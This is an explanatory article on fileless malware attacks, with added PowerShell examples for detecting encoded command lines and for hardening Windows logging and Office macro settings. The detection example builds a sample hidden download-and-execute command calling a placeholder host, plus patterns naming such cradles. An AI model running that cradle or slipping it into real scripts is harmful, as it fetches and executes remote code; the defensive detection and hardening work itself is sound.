A new kind of malware is giving hackers an edge in the war on cybercrime
Fileless malware attacks are on the rise – soaring a whopping 94 percent in the first half of 2018 – and cybersecurity experts are warning that this hard-to-detect infection method is trailblazing a whole new category of cyber-attacks that represents a stealthier future for malware.
Typically, malware relies on files: a malicious executable is written to the machine's hard disk, where antivirus can scan it. Fileless attacks – also known as zero-footprint, macro-based, or non-malware attacks – give hackers an edge against most security tools and enterprise defenders. Here's why: the attack leverages applications already installed on an endpoint and accepted as safe, so nothing new has to be installed and no malicious file ever lands on disk for a scanner to detect.
Instead, the attacker's instructions live only in the target's memory and are executed by built-in Windows tools that administrators already use to manage many endpoints at once (often called "living off the land"), which also makes it easy for the malware to move laterally to other machines. Common fileless attacks exploit browser vulnerabilities that make the browser run attacker-supplied code, abuse Microsoft Word macros, or use Microsoft's PowerShell or Windows Management Instrumentation (WMI) utilities.
In fact, PowerShell is particularly abused by fileless attackers because it is installed on every Windows machine, it can download and run code entirely in memory, it exposes the full Windows and .NET API at the privilege level of whoever runs it, and it is part of the daily workflow of many IT professionals. That last criterion makes it nearly impossible to ban employees from using it and makes heavy use less likely to raise red flags.
Using PowerShell or other reputable tools in a fileless malware attack makes it easy for attackers to quickly move from compromising a single machine to compromising an entire enterprise. With no file to fingerprint and no reason for security programs to question commands issued by a legitimate, signed program, these threats can fool many cybersecurity analysts, antimalware and antivirus software, and application whitelists, which only allow approved executables to run but have no reason to block powershell.exe.
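The following is an added example, not code from the original article: it shows what a fileless PowerShell launcher actually looks like on the command line and how a detection rule can decode and score it. The point is that the base64 blob defeats string signatures, but decoding it and looking at behavior (hidden window, profile bypass, download cradle, in-memory execution) does not. The indicator list, weights and the three sample command lines are constructed for illustration and are not a vendor rule set.

```powershell
# Added example: decode a PowerShell command line the way an EDR/SIEM rule might,
# then score it on behavioral indicators. Indicator names and the threshold of
# three hits are the author's assumptions, not a documented Microsoft or vendor rule.

function Get-DecodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc, ...
    if ($CommandLine -match '(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})') {
        $flag = $Matches[1].ToLower()
        $b64  = $Matches[2]
        if ('encodedcommand'.StartsWith($flag)) {
            try {
                # -EncodedCommand payloads are UTF-16LE, not UTF-8
                return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))
            } catch { return $null }
        }
    }
    return $null
}

function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = Get-DecodedCommand -CommandLine $CommandLine
    $text = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    $indicators = [ordered]@{
        'encoded command'       = [bool]$decoded
        'hidden window'         = $CommandLine -match '-w(?:indowstyle)?\s+hidden'
        'profile/policy bypass' = $CommandLine -match '-nop(?:rofile)?\b|-e(?:xecution)?p(?:olicy)?\s+bypass'
        'download cradle'       = $text -match 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biwr\b'
        'in-memory execution'   = $text -match '\bIEX\b|Invoke-Expression'
        'reflective loading'    = $text -match '\[Reflection\.Assembly\]::Load|VirtualAlloc|FromBase64String'
    }
    $hits = @($indicators.GetEnumerator() | Where-Object { $_.Value } | ForEach-Object { $_.Key })
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 3)   # assumed threshold
        Indicators = $hits
        Decoded    = $decoded
    }
}

# Constructed sample: an Emotet-style download cradle hidden behind -EncodedCommand.
# The URL is a placeholder; nothing is downloaded by this script.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://malware.example/stage2.ps1')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    "powershell.exe -NoP -W Hidden -Enc $b64",
    'powershell.exe -NoProfile -File C:\Scripts\Backup-Logs.ps1',          # routine admin job
    'powershell.exe -ExecutionPolicy Bypass -Command "Get-Service | Out-File svc.txt"'
)
foreach ($s in $samples) {
    $r     = Test-SuspiciousPowerShell -CommandLine $s
    $label = if ($r.Suspicious) { 'ALERT' } else { 'ok' }
    '{0,-6} {1}' -f $label, ($r.Indicators -join ', ')
}
```

Only the first sample trips the rule: it decodes to a download cradle and also runs hidden with the profile skipped, which a backup script or an ad hoc `-ExecutionPolicy Bypass` one-liner does not. In production the command lines would come from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled), and the decoded text is also available directly in PowerShell Script Block Logging (Event ID 4104), which records code after de-obfuscation.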
The Ponemon Institute’s 2018 State of Endpoint Security Risk report asserts that fileless malware attacks are 10 times more likely to succeed than file-based attacks. It also predicts that nearly 40 percent of attacks targeting companies in 2019 will be fileless.
The Equifax data breach, which exposed the personal information of nearly 150 million people in 2017, began as a fileless attack: the intruders exploited an unpatched vulnerability in the Apache Struts web framework to run code on the server without first dropping a malicious file.
Large-scale distribution of exploit kits makes an old threat new
Although the number of fileless attacks has recently exploded, the technique is not new. In-memory exploitation played a prominent role in 2003's SQL Slammer worm, for instance, which existed only as a single 376-byte UDP packet, never wrote anything to disk, knocked out Internet and cell phone coverage for 27 million people, and took nearly all of Bank of America's 13,000 ATMs in the U.S. offline.
But the creation and large-scale distribution of malicious toolkits (known as exploit kits) that make these attacks simple to launch has dramatically increased their frequency. As a result, this sophisticated attack method once limited to nation-states and other advanced adversaries is becoming common in commercial attacks as well.
In July 2018, US-CERT issued an alert about Emotet, a fileless banking trojan, downloader and botnet that it called one of the "most costly and destructive malware." Along with its frequent accomplice TrickBot, Emotet, which is most active in the U.S., spreads laterally through an entire network at breakneck speed, stealing information and dropping additional malware, while mutating every dropper to avoid signature detection. It borrows anti-forensic techniques previously wielded in complex nation-state attacks, giving the malware behaviors and tactics that resist many attempts at cleanup.
Infosecurity magazine reports that Emotet was detected and removed from networks more than 1.5 million times between January and September of 2018.
SamSam ransomware is another sophisticated fileless attack, wreaking havoc primarily on American businesses. Sophos reports that this ransomware has earned nearly $6 million for its creator to date, and the attacks show no sign of slowing down. Unlike the majority of ransomware, which relies on untargeted spam campaigns to infiltrate companies, SamSam is used in targeted, hands-on-keyboard attacks: skilled hackers break into a victim's network, scope it out, and then run the malware manually in a way designed to inflict maximum damage.
A SamSam attack that took down the City of Atlanta’s computer network in March is expected to cost taxpayers $17 million, including the cost of remediations like new equipment, software upgrades, and security services.
Protecting your business from fileless attacks
Traditional security systems are not built to spot and remove malware that resides in a machine's memory instead of on its disk. Most rely on signature-based detection, scan only files on disk, and lack the ability to monitor process memory or the behavior of trusted system tools.
Disabling Microsoft's own tools to prevent fileless attacks isn't really an option. PowerShell, for instance, is central to administering Windows and many other Microsoft products, and removing it would only make the jobs of IT professionals more complicated.
But while fileless attacks are exceptionally hard to thwart, organizations don’t need to feel helpless against them. Here are five steps you can take to protect your business:
- Make sure that the operating system, applications, and firmware on computers that connect to your network are kept up to date and that known security vulnerabilities are patched. Unpatched software is like putting out a welcome mat for hackers.
- Educate employees about phishing emails, and why it's risky to click links in emails or open attached files – even when they appear to come from known sources. The majority of malware, fileless attacks included, is delivered through phishing that often spoofs known people or organizations.
- Follow best practices for strong, unique passwords on system and service accounts, and use multi-factor authentication where it is available. Hackers can crack weak passwords in minutes with password-cracking tools.
- Remove or restrict administration tools that aren't needed so cybercriminals can't hijack them to launch fileless attacks: for example, uninstall the legacy PowerShell 2.0 engine, which lacks modern logging, and turn on PowerShell script block and module logging so that what does run is recorded. It's also wise to disable macros in Microsoft Office apps like Word and Excel, which cybercriminals use to gain an initial foothold.
- Monitor and block suspicious activity, such as Office or script processes trying to connect to untrusted servers or websites, and restrict outbound traffic from endpoints to what the business actually needs.
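The script below is an added example, not part of the original article, that turns the logging, tool-restriction and macro items of the list above into concrete Windows settings using their documented Group Policy registry equivalents. The transcript share, the choice of Office applications and the Office version key (16.0) are assumptions to adapt locally; it must run elevated and should be tested in a lab before it is pushed out by GPO or Intune.

```powershell
# Added example: hardening settings for the steps listed above. Registry paths are the
# documented Group Policy equivalents; the transcript share and Office app list are assumed.
# Run from an elevated PowerShell session.

function Set-RegDword {
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

# 1. Make PowerShell visible. Script block logging writes the de-obfuscated code of every
#    script block to Event ID 4104; module logging records pipeline activity for all modules;
#    transcription keeps a text copy of each session on a central share.
$ps = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
Set-RegDword "$ps\ScriptBlockLogging" 'EnableScriptBlockLogging' 1
Set-RegDword "$ps\ModuleLogging"      'EnableModuleLogging'      1
if (-not (Test-Path "$ps\ModuleLogging\ModuleNames")) { New-Item "$ps\ModuleLogging\ModuleNames" -Force | Out-Null }
New-ItemProperty "$ps\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null
Set-RegDword "$ps\Transcription" 'EnableTranscripting'    1
Set-RegDword "$ps\Transcription" 'EnableInvocationHeader' 1
New-ItemProperty "$ps\Transcription" -Name 'OutputDirectory' -Value '\\logserver\pstranscripts$' `
    -PropertyType String -Force | Out-Null   # assumed share; attackers cannot erase a remote copy

# 2. Remove the legacy engine attackers downgrade to with "powershell -version 2",
#    which predates script block logging and AMSI scanning.
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null

# 3. Block Office macros. VBAWarnings=4 disables all macros without notification, and
#    blockcontentexecutionfrominternet stops macros in files that carry the "downloaded
#    from the Internet" mark even where macros are otherwise allowed. These are per-user
#    (HKCU) policies; deploy them through GPO so they apply to every user.
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"   # 16.0 = Office 2016/2019/365
    Set-RegDword $sec 'VBAWarnings' 4
    Set-RegDword $sec 'blockcontentexecutionfrominternet' 1
}

# 4. Verify, so the change can be audited rather than assumed.
function Test-PowerShellLogging {
    $sb = Get-ItemProperty "$ps\ScriptBlockLogging" -ErrorAction SilentlyContinue
    $ml = Get-ItemProperty "$ps\ModuleLogging"      -ErrorAction SilentlyContinue
    return [bool]($sb.EnableScriptBlockLogging -eq 1 -and $ml.EnableModuleLogging -eq 1)
}
"PowerShell logging enabled: $(Test-PowerShellLogging)"
```

None of this removes PowerShell from administrators' hands; it makes abuse of it observable and closes the two cheapest evasions (the unlogged 2.0 engine and macro-launched scripts). Constrained Language Mode, which blocks the .NET and COM access that in-memory loaders depend on, is enforced through an AppLocker or Windows Defender Application Control policy rather than a registry switch, so it is left to that policy here.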
Winning the war against this new evolution of cybercrime rests in the ability to detect threats because they act like threats – and not necessarily because they look like one.
To successfully battle this new category of malware, companies need next-generation security software that takes a multi-layered approach to spotting and remediating threats, including behavioral detection capabilities that employ machine learning, the newest endpoint protections, and the ability to monitor entry points and network traffic for suspicious activity.
Hackers know that fileless attacks afford them the greatest chance of achieving their goals. A cutting-edge cybersecurity provider can help you implement a solution that learns from the threats it encounters, so you can do business confidently in the threat landscape of tomorrow.